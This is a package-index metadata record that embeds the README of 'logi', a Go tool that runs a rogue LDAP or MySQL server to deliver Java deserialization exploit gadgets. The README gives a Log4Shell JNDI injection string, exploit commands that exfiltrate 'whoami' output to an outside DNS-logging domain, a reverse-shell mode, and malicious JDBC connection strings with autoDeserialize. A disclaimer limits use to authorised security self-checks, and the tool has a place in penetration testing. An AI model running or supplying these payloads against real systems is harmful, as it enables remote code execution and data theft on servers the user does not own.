{"id":21523620,"url":"https://github.com/cokebeer/logi","last_synced_at":"2025-04-09T22:51:31.895Z","repository":{"id":62865160,"uuid":"556598376","full_name":"cokeBeer/logi","owner":"cokeBeer","description":"Logi is a LDAP/MySQL server focusing on pingback deserialize recon and exploit.","archived":false,"fork":false,"pushed_at":"2022-12-08T05:08:26.000Z","size":349,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-04-09T22:51:22.001Z","etag":null,"topics":["commons-beanutils","custom","cve-2020-14644","deserialize","exploit","gadget","go","java","jdbc","jndi","ldap","log4j","mysql","probe","server","wordlist"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cokeBeer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-10-24T06:41:53.000Z","updated_at":"2025-03-19T10:00:50.000Z","dependencies_parsed_at":"2023-01-24T23:30:07.118Z","dependency_job_id":null,"html_url":"https://github.com/cokeBeer/logi","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Flogi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Flogi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Flogi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Flogi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cokeBeer","download_url":"https://codeload.github.com/cokeBeer/logi/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248125643,"owners_count":21051766,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["commons-beanutils","custom","cve-2020-14644","deserialize","exploit","gadget","go","java","jdbc","jndi","ldap","log4j","mysql","probe","server","wordlist"],"created_at":"2024-11-24T01:18:50.433Z","updated_at":"2025-04-09T22:51:31.847Z","avatar_url":"https://github.com/cokeBeer.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ☕️LOGI\nLogi is a LDAP/MySQL server focusing on pingback deserialize recon and exploit.\n\n\n- [☕️LOGI](#️logi)\n  - [免责声明](#免责声明)\n  - [✨Get started](#get-started)\n  - [⚙️How it work](#️how-it-work)\n  - [🚀Examples](#examples)\n    - [📖LDAP](#ldap)\n    - [🐬MySQL](#mysql)\n  - [🔮Image](#image)\n  - [💻See also](#see-also)\n\n## 免责声明\n该工具仅用于安全自查检测。\n\n由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。\n\n本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许，不得善自使用本工具进行任何攻击活动，不得以任何方式将其用于商业目的。\n\n## ✨Get started\nDownload logi from [release](https://github.com/cokeBeer/logi/releases), or use `go install`\n```\ngo install github.com/cokeBeer/logi/cmd/logi@latest\n```\nUse `-h` to show help.\n```\n$ ./logi -h\nLogi is a LDAP/MySQL server focusing on pingback deserialize recon and exploit.\n\nUsage:\n  ./logi [flags]\n\nFlags:\nBASIC CONFIG:\n   -m, -mode int  1 for poc , 2 for probe, 3 for exploit\n   -t, -type int  1 for ldap, 2 for mysql\nSERVE CONFIG:\n   -i, -ip string    ip for binding (default \"0.0.0.0\")\n   -p, -port string  port for binding (default \"1389\")\n...\n```\n\n## ⚙️How it work\nLogi hosts a LDAP/MySQL service, waiting for LDAP lookup/MySQL connect\n- poc mode: reply a urldns gadget points to `domain` for deserialize verify\n- probe mode: reply different probe gadgets points to `probename.domain` in turn for dependency probe\n- exploit mode: reply a gadget for command execute\n\n## 🚀Examples\n### 📖LDAP\n**Poc mode**\n\nRun poc mode with dns domain `dnslog.me`:\n```\n./logi -t 1 -m 1 -d dnslog.me\n```\nYou need to send a ldap lookup to logi.\nFor example, a log4shell poc like below can trigger a jndi lookup to your server.\n```\n${jndi:ldap://your-ip:your-port/somepath}\n```\nlogi will send a response contains serialized payload. After target deserializes the payload, it will lookup a domain named `somepath.dnslog.me`. You can use this feature to confirm deserialize and mark targets.\n\n**Probe mode with embed wordlist**\n\nRun probe mode with dns domain `dnslog.me` with embed wordlist `yso`:\n```\n./logi -t 1 -m 2 -d dnslog.me -w yso\n```\nYou need to request many times to traverse the wordlist, which can be done by BurpSuite.\n```\nrepeat ${jndi:ldap://your-ip:your-port/somepath} many times\n```\nAfter target deserializes logi's response, it will lookup the domain `ith-classname.somepath.dnslog.me`. You can use this feature to probe dependencies. Also, the number of classes in dict will be printed to console when logi starts, you can use this information to control the repetition.\n\n**Probe mode with custom wordlist**\n\nRun probe mode with dns domain `dnslog.me` with custom wordlist in `./dict.txt`:\n```\n./logi -t 1 -m 2 -d dnslog.me -wp ./dict.txt\n```\nOne class name per line in dict.\n\n**Exploit mode with embed gadget**\n\nRun exploit mode with gadget `cb1v18`  with command `curl ${whoami}.dnslog.me`:\n```\n./logi -t 1 -m 3 -g cb1v18 -c 'curl ${whoami}.dnslog.me'\n```\n**Exploit mode to get a reverse shell**\n\nRun exploit mode with gadget `cb1v18` with reverse shell to `127.0.0.1:7777`:\n```\n./logi -t 1 -m 3 -g cb1v18 -s '127.0.0.1:7777'\n```\n**Exploit mode with custom gadget**\n\nRun exploit mode with custom binary payload in `./cc1`:\n```\n./logi -t 1 -m 3 -b ./cc1\n```\n\n### 🐬MySQL\nIn MySQL type, a fake MySQL server will be started. Mode poc and mode probe also work the same as LDAP type, but logi mainly focuses on exploit mode.\n\n\u003e it's ok just replace -t 1 with -t 2 in above commands\n\nRun exploit mode on port `3307` with gadget `cb1v18`  with command `curl ${whoami}.dnslog.me`:\n\n```\n./logi -t 2 -m 3 -p 3307 -g cb1v18 -c 'curl ${whoami}.dnslog.me'\n```\nYou need to send a JBDC connect to logi.\n```\njdbc:mysql://your-ip:your-port/someschema?autoDeserialize=true\u0026queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\u0026useSSL=false\n```\nYou can also remove the param `useSSL=false`， this will cause JDBC connecting on TLS, and logi supports TLS connection too :).\n```\njdbc:mysql://your-ip:your-port/someschema?autoDeserialize=true\u0026queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\n```\n\n## 🔮Image\n![image](image/logi.png)\n![image](image/dnslog.png)\n## 💻See also\n[GadgetProbe](https://github.com/BishopFox/GadgetProbe)\n\n[JNDI-Inject-Exploit](https://github.com/exp1orer/JNDI-Inject-Exploit)\n\n[Urldns](https://github.com/kezibei/Urldns)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcokebeer%2Flogi","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcokebeer%2Flogi","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcokebeer%2Flogi/lists"}